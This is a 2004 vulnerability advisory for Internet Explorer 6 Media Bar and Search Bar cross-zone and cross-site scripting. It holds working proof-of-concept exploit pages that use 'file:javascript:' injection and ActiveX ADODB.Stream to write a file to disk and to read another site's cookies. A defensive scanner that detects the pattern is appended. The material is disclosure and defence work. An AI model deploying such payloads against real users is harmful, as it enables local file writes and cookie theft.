New Internet Explorer Cross Zone/Site Scripting Vulnerability





#########################################################################

Advisory Name : Internet Explorer Cross Zone/Site Scripting Vulnerability
 Release Date : Mar 3,2004 
  Application : Microsoft Internet Explorer
    Tested On : MS-IE 6.0(sp1)
   Vendor URL : http://www.microsoft.com/ie
       Author : Cheng Peng Su(apple_soup_at_msn.com)

#########################################################################


[Proof of Concept]
   The code below loads a URL into the HTML content area of the Media Bar:
   window.open("http://www.google.com/","_media")
   JavaScript can also be injected:
   window.open("javascript:alert(location.href)","_media")
   On my computer, the code above shows me a MsgBox that says
        'res://C:\WINDOWS\SYSTEM\BROWSELC.DLL/mbLoading.htm'
   which suggests that it is executed in the My Computer Zone.
   Code can also be injected into a Media Bar that is already connected to a website.
   The Search Bar has the same vulnerability as the Media Bar.
   
[Exploit]
   !YOU CAN FIND THE DOCUMENT AT
   !http://www.freewebs.com/applesoup/CrossBar/document.txt
  
   The code uses the 'file:javascript:[script]' vulnerability, which was posted months ago.
   Maybe Microsoft has noticed the leak here, so I can't use only the javascript-protocol
   in the code, and the script-tag is filtered out, so I have to inject the script into
   an img-tag.
   
   I. In Media Bar
   1 . Cross Zone Scripting Exploit
   ---------------------------CrossZone.htm---------------------------
   <script>
   
   // '\\42' -> '\42' -> ' " '
   img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
   + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
   + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';

   inject_html="<img src='" + img_src + "'>";
   
   window.open('file:javascript:document.write("' + inject_html + '")','_media');

   </script>
   -------------------------------End---------------------------------
   
   
   2 . Cross Site Scripting Exploit
   ---------------------------CrossSite.htm---------------------------
   <script>

   window.open("http://www.google.com/","_media");
   setTimeout(function(){
   window.open("file:javascript:alert(document.cookie);","_media")
   },5000);
   
   </script>
   -------------------------------End---------------------------------
   
   
   
   
   II. In Search Bar
   1 . Cross Zone Scripting Exploit
   ---------------------------CrossZone.htm---------------------------
   <script>
   // Load the "Friendly HTTP error messages" page,
   // because it is in the My Computer Zone.
   window.open("http://wrong_site_add/","_search");
   setTimeout(function(){
   
      // '\\42' -> '\42' -> ' " '
      img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
      + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
      + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';

      inject_html="<img src='" + img_src + "'>";
   
      window.open('file:javascript:document.write("' + inject_html + '")','_search');

   },5000);
   
   </script>
   -------------------------------End---------------------------------
      
   
   2 . Cross Site Scripting Exploit
   ---------------------------CrossSite.htm---------------------------
   <script>

   window.open("http://www.google.com/","_search");
   setTimeout(function(){
   window.open("file:javascript:alert(document.cookie);","_search")
   },5000);
   
   </script>
   -------------------------------End---------------------------------

[Demo]
   Harmless demo:
   http://www.freewebs.com/applesoup/CrossBar/CrossSiteMB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossZoneMB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm
   
[Contact]
Cheng Peng Su
Class 1,Senior 2,high school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com
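
A defender-side check for the call pattern this advisory describes, as an added example that is not part of the original post: a static scanner that flags window.open() calls targeting the "_media" or "_search" bar frames and marks those whose URL begins with javascript: or file:javascript:. The names scanForBarInjection, splitArgs and SAMPLE are hypothetical, the sample page is constructed, and matching the target name without regard to case is a conservative assumption.

```javascript
// Added example (not from the advisory): flag window.open() calls aimed at
// the Explorer bar frames the advisory names, "_media" and "_search".
const BAR_TARGETS = new Set(["_media", "_search"]);

// Split the argument list that starts at src[start], honouring quotes and nesting.
function splitArgs(src, start) {
  const args = [];
  let depth = 0, quote = null, cur = "";
  for (let i = start; i < src.length; i++) {
    const c = src[i];
    if (quote) {
      cur += c;
      if (c === "\\") cur += src[++i] ?? "";   // keep escaped character as-is
      else if (c === quote) quote = null;      // closing quote
    } else if (c === '"' || c === "'") { quote = c; cur += c; }
    else if (c === "(") { depth++; cur += c; }
    else if (c === ")" && depth === 0) { args.push(cur.trim()); return args; }
    else if (c === ")") { depth--; cur += c; }
    else if (c === "," && depth === 0) { args.push(cur.trim()); cur = ""; }
    else cur += c;
  }
  return null; // unterminated call
}

function scanForBarInjection(src) {
  const findings = [];
  const re = /window\s*\.\s*open\s*\(/g;
  while (re.exec(src) !== null) {
    const args = splitArgs(src, re.lastIndex);
    if (!args || args.length < 2) continue;
    // Assumption: compare the target name case-insensitively to be conservative.
    const target = args[1].replace(/^["']|["']$/g, "").toLowerCase();
    if (!BAR_TARGETS.has(target)) continue;
    // A URL that starts with javascript: or file:javascript: carries script.
    const scripted = /^["']\s*(file:)?javascript:/i.test(args[0]);
    findings.push({ target, scripted, severity: scripted ? "high" : "review" });
  }
  return findings;
}

// Constructed sample page using the call shapes quoted in the advisory.
const SAMPLE = `
window.open("help.html", "_blank");
window.open("http://www.google.com/", "_media");
setTimeout(function(){ window.open("file:javascript:alert(document.cookie);", "_search") }, 5000);
window.open('file:javascript:document.write("' + html + '")', '_media');
`;
console.log(scanForBarInjection(SAMPLE));
```

A "review" finding is a plain URL loaded into a bar frame, which the advisory shows as the first step of the cross-site case; "high" means the URL argument itself carries script.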